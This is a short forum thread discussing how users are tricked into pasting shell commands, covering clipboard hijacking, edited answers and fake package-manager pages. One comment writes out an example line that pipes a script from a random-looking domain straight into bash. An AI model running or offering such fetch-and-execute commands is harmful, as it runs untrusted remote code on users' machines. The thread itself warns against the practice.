• kamen@lemmy.worldEnglish
    1273·
    3 days ago

    … and yet some of the same people will readily copy-paste random shell scripts into their terminal without fully understanding them.

    • f4f4f4f4f4f4f4f4@sopuli.xyzEnglish
      1·
      12 hours ago

      Even if you understand the commands, you need to trust the website because a malicious site can use JavaScript to copy something completely different into your clipboard, with a newline character at the end to automatically execute when pasted. (Is the newline exploit fixed in all shells? It used to fail in zsh but work in many others…)

      One can also paste into a text editor to verify before pasting into terminal, but what noob is going to know or bother to?

      • Mutelogic@sh.itjust.works
        36·
        3 days ago

        I feel like there’s some truth to this!

        If the posted answer was in a moderately active thread, you can generally assume it’s correct if there are no contradictory replies.

        • lemming741@lemmy.worldEnglish
          29·
          3 days ago

          If the thread has been dead a few weeks, they could edit their post. Or if it pulls a objects, those objects could change.

    • Possibly linux@lemmy.zipEnglish
      33·
      3 days ago
      curl gu5usgugiv.lol | bash || curl get.k3s.io | bash

      Someone did something similar to this with a fake brew package manager page. They paid Google to put it on the front page.

      • PieMePlenty@lemmy.world
        5·
        3 days ago

        In fact, you should delete the terminal altogether. On a related note, powershell access is considered taboo in corporate environments by IT departments. When security audits are done, you lose a point if powershell can be used. It is in fact considered a hacking tool.